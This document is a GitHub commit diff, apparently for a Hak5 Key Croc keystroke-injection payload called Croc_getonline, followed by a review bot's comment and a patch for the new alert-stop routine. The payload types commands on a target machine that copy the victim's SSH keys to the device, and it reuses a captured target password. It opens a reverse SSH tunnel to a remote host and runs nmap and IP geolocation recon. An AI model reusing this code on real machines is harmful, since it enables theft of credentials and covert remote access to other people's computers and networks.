Update Croc_getonline.txt

minor changes
added ICMP and port alerts
pull/62/head
spywill 2023-07-22 08:46:14 -04:00 committed by GitHub
parent 55053ddffb
commit 19f2907265
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 89 additions and 29 deletions


@ -2,7 +2,7 @@
# Description: Attempt to connect Keycroc automatically to target wifi access point # Description: Attempt to connect Keycroc automatically to target wifi access point
# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
# Author: spywill # Author: spywill
# Version: 4.1 # Version: 4.2
# Category: Key Croc # Category: Key Croc
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
@ -17,6 +17,7 @@
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL # getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET # getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot # getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
# getonline_T <-- MATCH word for Stopping ICMP/PORT alert
MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X) MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
QUACK LOCK QUACK LOCK
@ -40,11 +41,14 @@ known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
recon=off recon=off
recon_loot=/root/udisk/tools/Target_SSID.txt recon_loot=/root/udisk/tools/Target_SSID.txt
#---> Edit Linux target password below alert=off
alert_time=60
#---> Edit target password below
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
else else
target_password=ENTER_LINUX_PASSWORD_HERE target_password=ENTER_TARGET_PASSWORD_HERE
fi fi
recon_scan() { recon_scan() {
@ -53,10 +57,16 @@ recon_scan() {
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
QUACK ENTER QUACK ENTER
QUACK DELAY 2000 QUACK DELAY 2000
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY.txt\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
QUACK ENTER
QUACK DELAY 2000
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
QUACK ENTER QUACK ENTER
QUACK DELAY 2000 QUACK DELAY 2000
QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY.txt\" || :"
QUACK ENTER
QUACK DELAY 2000
else else
: :
fi fi
@ -103,6 +113,14 @@ CLEAN_UP() {
fi fi
} }
calculate_network_range() {
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
}
case $LOOT in case $LOOT in
getonline_W) getonline_W)
ENTER_STORAGE ENTER_STORAGE
@ -220,6 +238,22 @@ case $LOOT in
rm -f $recon_loot root/udisk/config.txt rm -f $recon_loot root/udisk/config.txt
apt -y remove sshpass apt -y remove sshpass
reboot --force reboot --force
RESET_PAYLOAD
;;
getonline_T)
if ps -p "$(sed -n 1p /tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then
kill -9 "$(sed -n 1p /tmp/port_pid.txt)"
fi
if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)"
fi
killall -9 tcpdump
sleep 1
else
:
fi
RESET_PAYLOAD
;; ;;
esac esac
sleep 3 sleep 3
@ -292,18 +326,13 @@ if : >/dev/tcp/8.8.8.8/53; then
QUACK ENTER QUACK ENTER
elif [ $option -eq 2 ]; then elif [ $option -eq 2 ]; then
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
if [ ! $? = 0 ] || [ ! "$status" = installed ]; then [ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass
apt -y install sshpass
else
:
fi
sleep 1 sleep 1
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null [ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
rm -rf ~/.ssh 2>/dev/null
ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
sleep 1 sleep 1
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
sleep 3
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
else else
LED R LED R
@ -324,10 +353,6 @@ else
LED R LED R
fi fi
sleep 3
LED OFF
QUACK UNLOCK
if [ "$recon" = "on" ]; then if [ "$recon" = "on" ]; then
LED C SLOW LED C SLOW
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
@ -337,28 +362,63 @@ if [ "$recon" = "on" ]; then
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
cat /etc/resolv.conf | grep nameserver >> $recon_loot cat /etc/resolv.conf | grep nameserver >> $recon_loot
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
calculate_network_range() {
ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
echo "$network_range"
}
perform_nmap_scan() { perform_nmap_scan() {
local network_range=$1 echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
nmap -T4 -F $network_range >> $recon_loot nmap -T4 -F $network_range >> $recon_loot
} }
network_range=$(calculate_network_range) calculate_network_range
perform_nmap_scan $network_range perform_nmap_scan
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
echo -ne "\n\n" >> $recon_loot echo -ne "\n\n" >> $recon_loot
LED OFF
elif [ "$recon" = "off" ]; then elif [ "$recon" = "off" ]; then
: :
else else
: :
fi fi
if [ "$alert" = "on" ]; then
icmp_alert() {
calculate_network_range
sleep 1
until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address'' | grep -o "IP.*" | sed 's/id.*//g; s/length.*//g' | sed 's/IP/\n&/g'); do
:
done
LED R SLOW
iptables -F
iptables -A OUTPUT -p icmp --icmp-type any -j DROP
sleep $alert_time
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
LED B ; sleep 2 ; LED OFF
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
}
port_alert() {
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
file=/tmp/tcpdump.out
until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do
:
done
LED R SLOW
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
sleep $alert_time
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
LED B ; sleep 2 ; LED OFF
port_alert & echo -ne $! > /tmp/port_pid.txt
}
iptables-save > /root/udisk/tools/firewall-rules-backup.txt
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
port_alert & echo -ne $! > /tmp/port_pid.txt
LED B
elif [ "$alert" = "off" ]; then
:
else
:
fi
sleep 3
LED OFF
QUACK UNLOCK
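Review bot: The new getonline_T arm can leave the Croc firewalled off the network: if the kill lands while port_alert or icmp_alert is inside `sleep $alert_time`, the `iptables-restore` that follows it never runs, so the `iptables -P INPUT/OUTPUT/FORWARD DROP` policies (or the ICMP OUTPUT drop rule) stay in place until something else restores them. The same arm reads the pid files unguarded, so a missing /tmp/port_pid.txt makes sed fail and `ps -p ""` error, and `kill -9` as the first resort gives the background shell no chance to exit cleanly. I would loop over both pid files, TERM the process only when the file exists and the pid is still alive, remove the pid file, and then restore the rules from the backup written by `iptables-save` when that file is present, as below. Separately, port_alert derives ip_address with `grep "inet addr"`, unlike the `inet (addr:)?` pattern this commit removes from the old calculate_network_range; if the device's ifconfig ever prints the bare `inet 10.x.x.x` form, ip_address is empty, the tcpdump filter becomes malformed and the `until` loop busy-spins on a failing tcpdump, so reusing calculate_network_range there would be safer.
```shell
getonline_T)
  for pid_file in /tmp/port_pid.txt /tmp/icmp_pid.txt; do
    if [ -f "$pid_file" ]; then
      pid=$(sed -n 1p "$pid_file")
      if [ -n "$pid" ] && ps -p "$pid" >/dev/null 2>&1; then
        kill -- "$pid"
      fi
      rm -f -- "$pid_file"
    fi
  done
  killall tcpdump 2>/dev/null
  sleep 1
  # the alert may have been stopped inside its DROP window; put the saved rules back
  if [ -f /root/udisk/tools/firewall-rules-backup.txt ]; then
    iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
  fi
  RESET_PAYLOAD
  ;;
```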